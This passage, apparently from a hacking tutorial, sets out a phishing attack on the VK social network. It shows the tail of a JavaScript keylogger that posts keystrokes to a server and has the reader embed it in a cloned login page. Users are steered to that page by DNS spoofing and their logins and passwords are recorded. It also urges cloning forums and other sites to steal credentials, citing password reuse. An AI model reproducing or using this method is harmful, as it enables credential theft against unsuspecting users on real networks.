http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}

And now to our index.php you need to add a line:

<script src="keylogger.js"></script>

This is the simplest keylogger, I think even on the Internet there will be a similar one somewhere.

So now let's go edit index.php, looking for the line "Log in" and looking for the parameter onclick= " top. showBox(....and change the address to https://vk.com

After that, when you click on the Log in button, the user will be directed to the off-site vk.

Then you can use dnsspoofing on the network and redirect all users to this site ) and record logs and passes from the keylogger. In a hacked network, this is more pleasant to do, because clones are banned on an open network, but it won't work locally. Although some browsers may quarrel.

The point of this article is not even in hacking the VK, because it is banal. You can clone any site and write anything in it, any javascript up to stealing all browser passwords =) More often it can even be forums, and given that 85% of people have the same usernames and passwords everywhere.